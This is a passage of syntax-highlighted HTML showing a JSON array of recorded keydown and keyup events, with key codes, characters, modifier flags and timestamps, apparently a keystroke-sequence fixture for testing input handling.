class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9226.03</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">9421.13</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9421.365</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9421.91</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9422.315</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9476.82</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9477.015</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9477.46</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9477.715</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9565.155</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9565.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span 
class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9565.795</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9566.04</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9606.39</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9606.625</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9607.065</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9607.355</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9676.815</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9677.015</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9691.495</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">9692.19</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9700.965</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9701.205</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9701.85</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9702.405</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9733.16</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9733.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9733.9</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9734.34</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9836.835</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span 
class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9837.075</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9838.42</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9838.965</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9949.645</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9949.885</span><span 
class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9950.5</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9950.92</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10005.665</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10005.915</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span 
class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10025.13</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10025.61</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10037.575</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10037.85</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10038.865</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span 
class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10039.455</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10141.195</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10141.51</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10142.325</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10142.79</span><span 
class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10163.5</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10164.015</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10164.405</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10164.775</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span 
class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10229.145</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10229.375</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10229.85</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10230.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10284.885</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span 
class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10285.08</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10304.3</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10304.72</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10326.93</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10327.25</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span 
class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10327.81</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10328.205</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10360.765</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10360.96</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10361.375</span><span 
class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10361.625</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10421.27</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10421.605</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10422.53</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span 
class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10422.865</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10597.02</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10597.255</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10597.755</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10598.025</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span 
class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10717.02</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10717.26</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10740.125</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10740.54</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10741.085</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span 
class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10741.71</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10742.335</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10742.94</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10852.88</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span 
